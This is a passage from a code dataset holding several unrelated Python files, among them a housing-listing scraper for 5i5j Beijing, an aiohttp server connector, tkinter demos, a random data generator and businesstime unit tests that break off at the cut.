continue\n if(line.startswith(' \"rating_position\": \"')):\n print(line[len(' \"rating_position\": \"'):-3])\n ratingPositionList.append(line[len(' \"rating_position\": \"'):-3])\n continue\n if(line.startswith(' \"date\": \"')):\n print(line[len(' \"date\": \"'):-3])\n dateList.append(line[len(' \"date\": \"'):-3])\n continue\n if(line.startswith(' \"tournaments_in_year\": \"')):\n print(line[len(' \"tournaments_in_year\": \"'):-3])\n champInYearList.append(line[len(' \"tournaments_in_year\": \"'):-3])\n continue\n if(line.startswith(' \"tournament_count_total\": \"')):\n print(line[len(' \"tournament_count_total\": \"'):-2])\n champsTotalList.append(line[len(' \"tournament_count_total\": \"'):-2])\n continue\n \n data = {'ID Player' : IDPlayerList,\n 'ID Release': IDReleaseList,\n 'Rating': ratingList,\n 'Rating Position': ratingPositionList,\n 'Date' : dateList,\n 'Tournaments In Year': champInYearList,\n 'Tournaments Count Total': champsTotalList}\n \n dataFrame = pd.DataFrame(data = data)\n dataFrame.set_index('ID Player', drop=True, inplace=True)\n\n filePath = 'E:\\\\playersRating.csv'\n if not os.path.isfile(filePath):\n dataFrame.to_csv(filePath, sep=',', encoding='utf-16')\n else:\n dataFrame.to_csv(filePath, encoding='utf-16', mode='a', sep=',', header=False)\n","sub_path":"_0. DWH/Projects/Viktoriya_Gruzitskaya/dwso/sources/scripts for data extract/PlayerRatingParser.py","file_name":"PlayerRatingParser.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"607094465","text":"import asyncio\nimport logging\nfrom asyncio import Queue\n\nimport aiohttp\nfrom aiohttp import web\n\nfrom .exceptions import DestinationNotAvailable\n\nfrom .base import BaseConnector\n\nlogger = logging.getLogger(__name__)\n\n\nclass ServerConnector(BaseConnector):\n \"\"\"ServerConnector creates a aiohttp based\n Web Server. This connector should be the parent class\n for all push-based connectors.\n \"\"\"\n\n connection_type = \"SERVER\"\n\n def __init__(self, host=\"localhost\", port=8777):\n self.RECEIVED_DATA_QUEUE = Queue(maxsize=500)\n self.host = host\n self.port = port\n self.app = web.Application()\n self.runner = None\n self.site = None\n\n async def start(self):\n \"\"\"start runs the server and starts listening\n to requests.\n\n Raises:\n DestinationNotAvailable: Raised if the selected port:host\n combo is unavailable\n \"\"\"\n self.runner = web.AppRunner(self.app)\n await self.runner.setup()\n self.site = web.TCPSite(self.runner, self.host, self.port)\n try:\n await self.site.start()\n except OSError as e:\n raise DestinationNotAvailable(\n f'Connection Failed: Error connecting to'\n f' {self.host}:{self.port} - {e}'\n ) from None\n\n async def echo(self, _):\n \"\"\"echo sends a generic response on request. This is to\n demonstrate how to create a request handler.\n\n Arguments:\n request {HTTPRequest} -- aio request\n\n Returns:\n HTTPResponse -- http Response for the request\n \"\"\"\n return web.Response(text=f'Hello from {self.host}:{self.port}\\n'\n f'{self.get_connection_details()}')\n\n def get_connection_details(self):\n \"\"\"return the connection details as a dict\n\n Returns:\n dict -- connection details dictionary\n \"\"\"\n return dict(connection_type=self.connection_type,\n host=self.host, port=self.port)\n\n async def handle_received_data(self, data):\n \"\"\"handle_received_data stores the data into the\n received_data_queue. 
This queue is exposed for consumption\n by other objects/pipelines.\n \"\"\"\n if not data:\n return\n logger.debug(\"Enqueuing data in RECEIVED_DATA_QUEUE\")\n await self.RECEIVED_DATA_QUEUE.put(data)\n\n async def stop(self):\n \"\"\"stops the server and runs the cleanup\n \"\"\"\n self.RECEIVED_DATA_QUEUE = Queue(maxsize=500)\n await self.runner.cleanup()\n","sub_path":"tcp_connectors/server_connector.py","file_name":"server_connector.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"156672246","text":"##!/usr/bin/python3\n\nfrom pyrob.api import *\n\n\n@task(delay=0.02)\ndef task_2_4():\n N = 0\n while N != 5:\n n = 0\n while n != 10:\n move_right(2)\n move_down(1)\n fill_cell()\n move_up(1)\n move_left()\n fill_cell()\n move_down()\n fill_cell()\n move_down()\n fill_cell()\n move_up()\n move_left()\n fill_cell()\n if n != 9:\n move_right(4)\n move_up()\n n += 1\n while not wall_is_on_the_left():\n move_left()\n if N != 4:\n move_down(3)\n N += 1\n move_up()\n pass\n\n\nif __name__ == '__main__':\n run_tasks()\n","sub_path":"task_26.py","file_name":"task_26.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485490417","text":"import sys\r\nsys.path.append(\".\")\r\n\r\nimport settings\r\nimport numpy as np\r\n\r\ndef randomUniform():\r\n\r\n size = settings.neural_network['size']\r\n\r\n weights = []\r\n for layer in range(0, len(size) - 1, 1):\r\n weights.append(np.random.uniform(-1, 1, (size[layer], size[layer+1])))\r\n\r\n biases = []\r\n for layer in range(1, len(size), 1):\r\n biases.append(np.random.uniform(-1, 1, (size[layer], 1)))\r\n\r\n return weights, biases\r\n\r\ndef randomStart(population):\r\n\r\n if settings.genetic_algorithm['random start'] == 'random uniform':\r\n for individual in population.individuals:\r\n individual.neural_network.weights, individual.neural_network.biases = randomUniform()\r\n\r\n else:\r\n raise Exception(\"Random start option not found!\")\r\n\r\n return population","sub_path":"genetic_algorithm/random_start.py","file_name":"random_start.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"230442915","text":"from graphics import *\n\ndef main():\n win = GraphWin('Floor', 500, 500)\n\n win.setCoords(0.0, 0.0, 10.0, 10.0)\n win.setBackground(\"yellow\")\n\n # draw grid\n for x in range(10):\n for y in range(10):\n win.plotPixel(x*50, y*50, \"blue\")\n\n square = Rectangle(Point(5,5), Point(6,6))\n square.draw(win)\n square.setFill(\"black\")\n\n win.getMouse()\n win.close()\n\nmain()\n","sub_path":"ModelAlternative/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"157631023","text":"import os\nimport random\nimport string\nimport math\nfrom datetime import datetime, timedelta\nfrom random import randrange\n\n\ndirectory_path = os.path.dirname(__file__)\n\n# Usernames\ndef username(num_results=1):\n adjectives, nouns = [], []\n with open(os.path.join(directory_path, 'data', 'adjectives.txt'), 'r') as file_adjective:\n with open(os.path.join(directory_path, 'data', 'nouns.txt'), 'r') as file_noun:\n for line in file_adjective:\n adjectives.append(line.strip())\n for line in file_noun:\n nouns.append(line.strip())\n\n usernames = []\n for 
_ in range(num_results):\n adjective = random.choice(adjectives)\n noun = random.choice(nouns).capitalize()\n num = str(random.randrange(10))\n usernames.append(adjective + noun + num)\n\n return usernames\n\n# Email domains\ndef emailDomain():\n with open(os.path.join(directory_path, 'data', 'domains.txt'), 'r') as file_domain:\n dom = random.choice(file_domain.read().splitlines())\n domain = '@' + dom\n\n return domain\n\n# First names\ndef firstName():\n with open(os.path.join(directory_path, 'data', 'firstNames.txt'), 'r') as file_fNames:\n name = random.choice(file_fNames.read().splitlines())\n\n return name\n\n# Last names\ndef lastName():\n with open(os.path.join(directory_path, 'data', 'lastNames.txt'), 'r') as file_lNames:\n name = random.choice(file_lNames.read().splitlines())\n\n return name\n\n# Passwords\ndef password(length = 11):\n chars = string.ascii_letters + string.digits \n pw = ''\n for i in range(length):\n pw += random.choice(chars)\n\n return pw\n\n# Creation times\ndef createTime():\n oldest = datetime.strptime('1/1/2009', '%m/%d/%Y')\n newest= datetime.strptime('12/31/2019', '%m/%d/%Y')\n delta = newest - oldest\n dateRange = (delta.days)\n randomDays = randrange(dateRange) \n date = oldest + timedelta(days=randomDays)\n\n return date\n\n# Last update times\ndef lastUpdate(oldest = datetime.strptime('1/1/2009', '%m/%d/%Y')):\n newest= datetime.strptime('12/31/2019', '%m/%d/%Y')\n delta = newest - oldest\n dateRange = (delta.days)\n randomDays = randrange(dateRange) \n date = oldest + timedelta(days=randomDays)\n date = date.date()\n\n return date\n\ndef ageList(POPULATION):\n #age = os.path.dirname(__file__) + '/ages.txt'\n\n RANGES = [(13,17),(18,24),(25,34),(35,44),(45,54),(55,64),(65,116)] # min, max age for each age group\n AGES = len(RANGES) # number of age groups\n DIST = [.058,.25,.322,.165,.102,.06,.043] #distribution of the age groups\n\n agelist = []\n\n for i in range (AGES):\n for x in range (math.ceil(POPULATION * DIST[i])):\n agelist.append(random.randint(RANGES[i][0], RANGES[i][1]))\n \n\n # with open(age,'w+',encoding='utf-8') as file:\n # for age in agelist:\n # file.write(str(age) + '\\n')\n return agelist\n\n\n\n\n \n","sub_path":"A09/RandomDataGeneratorA09/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"597822235","text":"'''\n1. 
Fetch listing information from the url\n\n'''\n\nimport random\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport pymysql\n\nimport tablib\n\ncount=1\nuser_agent_list = [\n\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\n# \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\",\n# \"Mozilla/5.0 (Windows NT 10.0; WOW64) Gecko/20100101 Firefox/61.0\",\n# \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36\",\n# \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36\",\n# \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36\",\n# \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\",\n# \"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15\",\n]\nzj1='500'\nzj2='1200'\nmj1='80'\nmj2='200'\nj3='l3'\nj4='l4'\nj5='l5'\nlocation = {\"andingmen\",\"anzhen1\",\"aolinpikegongyuan11\",\"dongzhimen\",\n \"gongti\",\"guozhan1\",\"hepingli\",\"huixinxijie\",\"madian1\",\"nanshatan1\",\n \"sanlitun\",\"sanyuanqiao\",\"shaoyaoju\",\"taiyanggong\",\"xibahe\",\"yayuncun\",\n \"yayuncunxiaoying\",\"wangjing\"}\ndistrict_list={\"dongcheng\",\"xicheng\",\"chaoyang\",\"haidian\",\"fengtai\"}\n\ndistrict_list={\"haidian\"}\n\ndiqu_rate= 20\n\nchaoxiang_rate=10\nhuxing_rate=8\nzhuangxiu_rate=7\n\nlouceng_rate=8\nzonggao_rate=4\nniandai_rate=6\nlouxing_rate=3.5\n\nVR_rate=1\nditie_rate=6\nkanfang_rate=1\n\ntaxfree_rate=5\n\n'''\nl3l4l5: three/four/five-bedroom units\nie2: with elevator, ie1: without elevator\nf: facing east/south/west/north, f5: south-north facing\nlc: floor level, lc5: top floor\nurl = 'bp'+zj1+'ep'+mj2+'ba'+mj1+'ea'+mj2+'l3l4l5hu0sf1lc2lc3lc5f5ie2'\n\n'''\n\nfirst_url = 'https://bj.5i5j.com/ershoufang/xichengqu/b500e1200f1f3f5h300l50r2r3r4r5r9n'\n\n\n\nmylist = []\ndatabase =[]\ndate1=''\ndate2=''\n\ndef get_html(url):\n\n headers = {'User-Agent': '', 'referer': 'link'}\n headers['User-Agent'] = random.choice(user_agent_list)\n response = requests.get(url, headers=headers)\n response.encoding = 'utf-8'\n html = response.text\n soup = BeautifulSoup(html, \"lxml\")\n try:\n title = soup.title.string\n print('没变:',title[0:40])\n\n\n\n except:\n print('改变啦')\n script=html.head.script.text\n url = script[script.find(\"'\", 1):-1].strip()\n print(soup)\n get_html(url)\n\n return soup\n\ndef house_info(dis,i):\n global count\n page_url = str(i+1)\n detail_url = first_url+page_url\n print(detail_url)\n\n soup = get_html(detail_url)\n\n url_list = soup.find('div', class_=\"list-con-box\").find_all('li')\n\n for item in url_list:\n score=0\n url = item.find('div',class_='listImg').a.attrs['href']\n id = url[12:-5]\n url = 'https://bj.5i5j.com'+url\n\n id = \"Aj\"+id\n title = item.find('h3',class_='listTit').a.text.strip()\n # print('关注:','https://bj.5i5j.com'+url)\n # print('id:',id)\n # print('标题:',title)\n info1 = item.find('i',class_='i_01').find_parent('p').text.strip().replace(' ','')\n huxing = info1[0:info1.find('·', 1)].strip()\n mianji = info1[info1.find('·', 1)+1:info1.find('平米', 1)].strip()\n\n chaoxiang = info1[info1.find('平米')+3:info1.rfind('·',0,-8)].strip()\n louceng = info1[info1.rfind('·',0,-8)+1:info1.rfind('/')].strip()\n\n zonggao = info1[info1.rfind(\"/\", 1)+1:info1.rfind(\"·\", 1)].strip()\n zhuangxiu = info1[info1.rfind('·', 1)+1:].strip()\n\n # print('户型:',huxing)\n # print('面积:',mianji)\n # print('朝向:',chaoxiang)\n #\n # 
print('楼层:',louceng)\n # print('总高:',zonggao)\n # print('装修:',zhuangxiu)\n\n info2 = item.find('i',class_='i_02').find_parent('p').text.strip()\n diqu=info2[0:info2.find(' ',1)].strip()\n xiaoqu = info2[info2.find(' ',1):info2.rfind('·',1)].strip()\n ditie=info2[info2.rfind('·',1)+2:].strip()\n # print('地区:',diqu)\n # print('小区:',xiaoqu)\n # print('地铁:',ditie)\n\n info3 = item.find('i',class_='i_03').find_parent('p').text.strip()\n guanzhu=info3[0:info3.find(' ',1)].strip()\n daikan=info3[info3.find('带看',1)+2:info3.rfind('次',1)].strip()\n fabu=info3[info3.rfind('·',1)+2:-2].strip()\n # print('关注:',guanzhu)\n # print('带看:',daikan)\n # print('发布:',fabu)\n\n\n zongjia = item.find('p',class_='redC').find('strong').text.strip()\n danjiatt = item.find('div',class_='jia').text.replace(' ','').replace('\\n','').strip()\n danjia = danjiatt[danjiatt.rfind('单价', 1)+2:-4]\n\n\n\n dianti=''\n\n\n niandai=''\n louxing=''\n\n\n\n\n VR = ''\n kanfang = ''\n taxfree=''\n # try:\n # taxfree=item.find_element_by_class_name('taxfree').text.strip()\n # taxfree = '5年'\n # except:\n # try:\n # taxfree=item.find_element_by_class_name('five').text.strip()\n # taxfree='2年'\n # except:\n # taxfree='不满'\n\n\n\n if diqu== '和平里': diqu_score = 14 * diqu_rate\n elif diqu == '和平里': diqu_score = 10 * diqu_rate\n elif diqu == '惠新西街': diqu_score = 9 * diqu_rate\n elif diqu == '芍药居': diqu_score = 8 * diqu_rate\n elif diqu == '亚运村': diqu_score = 8 * diqu_rate\n elif diqu == '国展': diqu_score = 8 * diqu_rate\n elif diqu == '亚运村小营': diqu_score = 8 * diqu_rate\n elif diqu == '西坝河': diqu_score = 8 * diqu_rate\n elif diqu == 'CBD': diqu_score = 7 * diqu_rate\n elif diqu == '太阳宫': diqu_score = 8 * diqu_rate\n elif diqu == '朝阳门外': diqu_score = 6 * diqu_rate\n elif diqu == '健翔桥': diqu_score = 7 * diqu_rate\n elif diqu == '三元桥': diqu_score = 7 * diqu_rate\n elif diqu == '望京': diqu_score = 6 * diqu_rate\n elif diqu == '奥林匹克公园': diqu_score = 6 * diqu_rate\n elif diqu == '燕莎': diqu_score = 6 * diqu_rate\n elif diqu == '北苑': diqu_score = 5 * diqu_rate\n elif diqu == '大望路': diqu_score = 5 * diqu_rate\n elif diqu == '南沙滩': diqu_score = 5 * diqu_rate\n elif diqu == '农展馆': diqu_score = 5 * diqu_rate\n elif diqu == '四惠': diqu_score = 3 * diqu_rate\n elif diqu == '双井': diqu_score = 3 * diqu_rate\n elif diqu == '朝阳公园': diqu_score = 3 * diqu_rate\n elif diqu == '华威桥': diqu_score = 3 * diqu_rate\n elif diqu == '劲松': diqu_score = 3 * diqu_rate\n elif diqu == '北工大': diqu_score = 3 * diqu_rate\n elif diqu == '立水桥': diqu_score = 3 * diqu_rate\n elif diqu == '潘家园': diqu_score = 3 * diqu_rate\n elif diqu == '酒仙桥': diqu_score = 3 * diqu_rate\n elif diqu == '红庙': diqu_score = 3 * diqu_rate\n elif diqu == '十里河': diqu_score = 3 * diqu_rate\n elif diqu == '大山子': diqu_score = 2 * diqu_rate\n elif diqu == '十八里店': diqu_score = 2 * diqu_rate\n elif diqu == '双桥': diqu_score = 1 * diqu_rate\n elif diqu == '朝青': diqu_score = 1 * diqu_rate\n elif diqu == '东坝': diqu_score = 1 * diqu_rate\n elif diqu == '常营': diqu_score = 1 * diqu_rate\n elif diqu == '欢乐谷': diqu_score = 1 * diqu_rate\n elif diqu == '豆各庄': diqu_score = 1 * diqu_rate\n elif diqu == '石佛营': diqu_score = 1 * diqu_rate\n elif diqu == '百子湾': diqu_score = 1 * diqu_rate\n elif diqu == '甜水园': diqu_score = 2 * diqu_rate\n elif diqu == '十里堡': diqu_score = 1 * diqu_rate\n elif diqu == '成寿寺': diqu_score = 1 * diqu_rate\n elif diqu == '垡头': diqu_score = 1 * diqu_rate\n elif diqu == '定福庄': diqu_score = 1 * diqu_rate\n elif diqu == '高碑店': diqu_score = 1 * diqu_rate\n elif diqu == '甘露园': diqu_score = 1 * diqu_rate\n elif 
diqu == '朝阳其它': diqu_score = 1 * diqu_rate\n else : diqu_score = 1 * diqu_rate\n\n if zhuangxiu == '5室3厅':\n huxing_score = 14 * huxing_rate\n elif chaoxiang == '5室2厅':\n huxing_score = 13 * huxing_rate\n elif chaoxiang == '5室1厅':\n huxing_score = 12 * huxing_rate\n elif chaoxiang == '4室3厅':\n huxing_score = 13 * huxing_rate\n elif chaoxiang == '4室2厅':\n huxing_score = 12 * huxing_rate\n elif chaoxiang == '4室1厅':\n huxing_score = 11 * huxing_rate\n elif chaoxiang == '3室3厅':\n huxing_score = 12 * huxing_rate\n elif chaoxiang == '3室2厅':\n huxing_score = 11 * huxing_rate\n elif chaoxiang == '3室1厅':\n huxing_score = 10 * huxing_rate\n elif chaoxiang == '3室0厅':\n huxing_score = 7 * huxing_rate\n elif chaoxiang == '2室2厅':\n huxing_score = 8 * huxing_rate\n elif chaoxiang == '2室1厅':\n huxing_score = 7 * huxing_rate\n elif chaoxiang == '2室0厅':\n huxing_score = 5 * huxing_rate\n else:\n huxing_score = 2 * huxing_rate\n\n\n\n\n\n\n if chaoxiang.replace(' ','')=='南北': chaoxiang_score=10*chaoxiang_rate\n elif chaoxiang.replace(' ','')=='东南北': chaoxiang_score=7*chaoxiang_rate\n else: chaoxiang_score=4*huxing_rate\n\n if zhuangxiu == '精装':\n zhuangxiu_score= 10*zhuangxiu_rate\n elif chaoxiang == '其他':\n zhuangxiu_score = 6*zhuangxiu_rate\n elif chaoxiang == '简装':\n zhuangxiu_score = 6*zhuangxiu_rate\n else:\n zhuangxiu_score = 2*zhuangxiu_rate\n\n fangwu_score = chaoxiang_score+zhuangxiu_score+huxing_score\n\n try:\n if int(zonggao[1:-1]) >= 20:\n zonggao_score = 10*zonggao_rate\n elif int(zonggao[1:-1]) >= 15:\n zonggao_score = 8.5*zonggao_rate\n elif int(zonggao[1:-1]) >= 10:\n zonggao_score = 7*zonggao_rate\n else:\n zonggao_score = 5*zonggao_rate\n except: zonggao_score = 5*zonggao_rate\n\n if louceng == '高楼层':\n louceng_score = 10*louceng_rate\n elif louceng == '顶层':\n louceng_score = 9*louceng_rate\n elif louceng == '中楼层':\n louceng_score = 7*louceng_rate\n zonggao_score = 0.5*zonggao_score\n elif louceng == '低楼层':\n louceng_score = 4.5*louceng_rate\n zonggao_score = 0\n else:\n louceng_score = 2*louceng_rate\n zonggao_score = 0\n\n if louxing == '板楼':\n louxing_score = 10*louxing_rate\n elif louxing == '板塔结合':\n louxing_score = 8.5*louxing_rate\n else :\n louxing_score = 6.5*louxing_rate\n\n\n # 楼龄\n try:\n if int(niandai) >= 2010:\n niandai_score = 10*niandai_rate\n elif int(niandai) >= 2000:\n niandai_score = 8*niandai_rate\n elif int(niandai) >= 1990:\n niandai_score = 5*niandai_rate\n else:\n niandai_score = 3*niandai_rate\n except: niandai_score = 3*niandai_rate\n\n lou_score = louxing_score + louceng_score + niandai_score + zonggao_score\n\n # 近地铁,vr,随时看房\n if ditie=='近地铁':\n ditie_score = 10*ditie_rate\n else:\n ditie_score=0\n if VR == 'VR房源':\n VR_score = 10*VR_rate\n else:\n VR_score=0\n if kanfang == '随时看房':\n kanfang_score = 10*kanfang_rate\n else:\n kanfang_score=0\n\n # 满五唯一\n if taxfree=='5年':\n taxfree_score = 10*taxfree_rate\n elif taxfree == '2年':\n taxfree_score = 6*taxfree_rate\n else:\n taxfree_score = 2*taxfree_rate\n\n fujia_score = diqu_score+ditie_score+VR_score+kanfang_score+taxfree_score\n # score =float('%.2f' %((fujia_score+fangwu_score+lou_score)/6))\n # rate_score = float('%.2f' % (score/int(danjia)*80000))\n score = 0\n rate_score =0\n print('=================' + dis + '===' + str(count) + '=================')\n print(' 链接 :' + url)\n print(' ID :' + str(id))\n print(' 简介 :' + title)\n print(' 地区 :' + diqu)\n # print(' 评分 :' , score, end='')\n # print(' 性价比 :' , rate_score, end='')\n print(' 总价 :' + zongjia)\n print(' 单价 :' + danjia)\n print(' 详情 :')\n print(' 小区 
:' + xiaoqu)\n print(' 户型 :' + huxing)\n print(' 面积 :' + mianji)\n print(' 朝向 :' + chaoxiang)\n print(' 装修 :' + zhuangxiu)\n print(' 电梯 :' + dianti)\n print(' 楼层 :' + louceng)\n print(' 总高 :' + zonggao)\n #\n # print(' 年代 :' + niandai)\n # print(' 楼型 :' + louxing)\n print(' 地铁 :' + ditie)\n # print(' VR :' + VR)\n # print(' 购房 :' + taxfree)\n # print(' 看房 :' + kanfang)\n print(' 关注 :' + guanzhu)\n print(' 带看 :' + daikan)\n\n print(' 发布 :', fabu)\n\n\n\n\n\n\n mylist.append([id,score,rate_score,url, title, dis,diqu, xiaoqu, zongjia, danjia, huxing, mianji, chaoxiang, zhuangxiu,\n dianti, louceng,zonggao, niandai, louxing, ditie, VR, taxfree, fabu, guanzhu,daikan])\n\n count=count+1\n\n save_to_excel(dis,mylist)\n time.sleep(10)\n\n\ndef save_to_excel(dis,mylist):\n\n headers = (\n 'ID','总分','性价比','url', '标题', '城区','地区', '小区', '总价', '单价','户型', '面积', '朝向', '装修',\n '电梯', '楼层','总楼层', '年代', '楼型', '地铁', 'VR', '满五', '发布', '关注量','带看量')\n #print(mylist)\n\n mylist = tablib.Dataset(*mylist, headers=headers)\n\n with open('D:\\zhaofang_AJ_'+dis+'.xlsx', 'wb') as f:\n f.write(mylist.export('xlsx'))\n\ndef save_to_database1():\n db = pymysql.connect(host='localhost', user='root', password='777748', port=3306, db='zhaofang')\n cursor = db.cursor()\n try:\n\n for i in range(3):\n sql = \"INSERT INTO zhaofang \" \\\n \"(id,score,rate_score,url, title, \" \\\n \"dis,diqu, xiaoqu, zongjia, danjia, \" \\\n \"huxing, mianji, chaoxiang, zhuangxiu,dianti, \" \\\n \"louceng,zonggao, niandai, louxing, \" \\\n \"ditie, VR, taxfree, kanfang, guanzhu,daikan) VALUES \" \\\n \"(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) ON DUPLICATE KEY UPDATE \" \\\n \"vote=\" + \"'\" +str(mylist[i][4]) + \"',\"\\\n \"Meta_rate=\" + \"'\" + str(mylist[i][5]) + \"',\"\\\n \"Mtime_rate=\" + \"'\" + str(mylist[i][6] )+ \"',\"\\\n \"douban_rate=\" + \"'\" + str(mylist[i][7]) + \"',\"\\\n \"my_rate=\" + \"'\" +str( mylist[i][8]) + \"',\"\\\n \"budget=\" + \"'\" + str(mylist[i][13]) + \"',\"\\\n \"gross=\" + \"'\" + str(mylist[i][14]) + \"'\"\\\n\n\n\n cursor.execute(sql, (mylist[i][0],mylist[i][1],mylist[i][2],mylist[i][3],mylist[i][4],mylist[i][5],\n mylist[i][6],mylist[i][7],mylist[i][8],mylist[i][9],mylist[i][10],mylist[i][11],\n mylist[i][12], mylist[i][13],mylist[i][14],mylist[i][15],mylist[i][16],mylist[i][17],mylist[i][18]))\n\n print(sql)\n print('Successful')\n db.commit()\n except Exception as e:\n print('错误')\n print(e)\n\n db.rollback()\n db.close()\n\n\n\ndef total_pages(url):\n soup = get_html(url)\n print('total_pages',soup)\n house_number = int(soup.find('div', class_=\"total-box\").text[3:-3].strip())\n page_number= int(get_url(house_number))\n print('----共计'+str(house_number)+'套房屋----')\n print('----共计'+str(page_number)+'页----')\n return page_number\n\n\n\ndef get_url(next_page):\n if next_page<=30:\n return 1\n else :\n return int(next_page)/30+1\n\ndef main():\n for dis in district_list:\n district_first_url = first_url + '1'\n print(\"区域:\"+dis)\n total_page=total_pages(district_first_url)\n for i in range(total_page):\n\n house_info(dis,i)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"com/myfish/zhaofang/aijia.py","file_name":"aijia.py","file_ext":"py","file_size_in_byte":16674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485260732","text":"from tkinter import *\nimport tkinter.messagebox as messagebox\n\nclass Application(Frame):\n\n\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.pack()\n 
self.create_widgets()\n\n def create_widgets(self):\n self.helloLabel = Label(self, text='Hello, world!')\n self.helloLabel.pack()\n self.quitButton = Button(self, text='Quit', command=self.quit)\n self.quitButton.pack()\n\n\n# application = Application()\n# # 设置窗口标题\n# application.master.title('Hello world')\n# application.mainloop()\n\n\nclass InputApplication(Frame):\n\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.pack()\n self.create_widgets()\n\n def create_widgets(self):\n self.nameInput = Entry(self)\n self.nameInput.pack()\n self.quitButton = Button(self, text='Hello', command=self.hello)\n self.quitButton.pack()\n\n def hello(self):\n name = self.nameInput.get() or 'world'\n messagebox.showinfo('Message', 'Hello %s' % name)\n\napplication = InputApplication()\n# 设置窗口标题\napplication.master.title('Hello world')\napplication.mainloop()\n","sub_path":"src/ui/use_tkinter.py","file_name":"use_tkinter.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"464232065","text":"import math\ndef tours(adj, N):\n facts = [0]*N\n z=0\n for i in range(len(adj)):\n vertList = adj[i]\n z_count = 0\n nz_count = 0\n for neighbor in vertList:\n if len(adj[neighbor]) == 1:\n facts[i] += 1\n z_count += 1\n z+= 1\n else:\n nz_count += 1\n if nz_count > 2:\n return 0\n sum = 1\n for num in facts:\n sum = (sum * math.factorial(num)) % 1000000007\n if z == N-1:\n return sum\n return (2*sum)% 1000000007\n \nT = int(input())\nfor i in range(T):\n N = int(input())\n adj = [[] for i in range(N)]\n for x in range(1, N):\n road = list(map(int,input().split()))\n adj[road[0]].append(road[1])\n adj[road[1]].append(road[0])\n print(tours(adj, N))\n","sub_path":"Algorithm/bytelandian_tour.py","file_name":"bytelandian_tour.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"613346919","text":"from datetime import datetime, date, timedelta\nimport unittest\n\nfrom businesstime import BusinessTime, USFederalHolidays\n\n\nclass BusinessTimeTest(unittest.TestCase):\n\n def setUp(self):\n \"\"\"\n Tests mostly based around January 2014, where two holidays, New Years Day\n and MLK day, fall on the 1st and 20th, respectively.\n\n January 2014\n Su Mo Tu We Th Fr Sa\n 1 2 3 4\n 5 6 7 8 9 10 11\n 12 13 14 15 16 17 18\n 19 20 21 22 23 24 25\n 26 27 28 29 30 31\n \"\"\"\n self.bt = BusinessTime(holidays=USFederalHolidays())\n\n def test_iterdays(self):\n start = datetime(2014, 1, 16)\n end = datetime(2014, 1, 22)\n self.assertEqual(\n tuple(self.bt.iterdays(start, end)),\n (\n datetime(2014, 1, 16),\n datetime(2014, 1, 17),\n datetime(2014, 1, 18),\n datetime(2014, 1, 19),\n datetime(2014, 1, 20),\n datetime(2014, 1, 21)\n )\n )\n\n def test_iterdays_same_day(self):\n start = datetime(2014, 1, 16, 12, 15)\n end = datetime(2014, 1, 16, 12, 16)\n self.assertEqual(\n tuple(self.bt.iterdays(start, end)),\n (\n datetime(2014, 1, 16),\n )\n )\n\n def test_iterdays_clears_time(self):\n start = datetime(2014, 1, 16, 12, 12, 11)\n end = datetime(2014, 1, 18, 15)\n self.assertEqual(\n tuple(self.bt.iterdays(start, end)),\n (\n datetime(2014, 1, 16),\n datetime(2014, 1, 17)\n )\n )\n\n def test_iterweekdays(self):\n start = datetime(2014, 1, 16)\n end = datetime(2014, 1, 22)\n self.assertEqual(\n tuple(self.bt.iterweekdays(start, end)),\n (\n datetime(2014, 1, 16),\n datetime(2014, 1, 17),\n datetime(2014, 1, 20),\n 
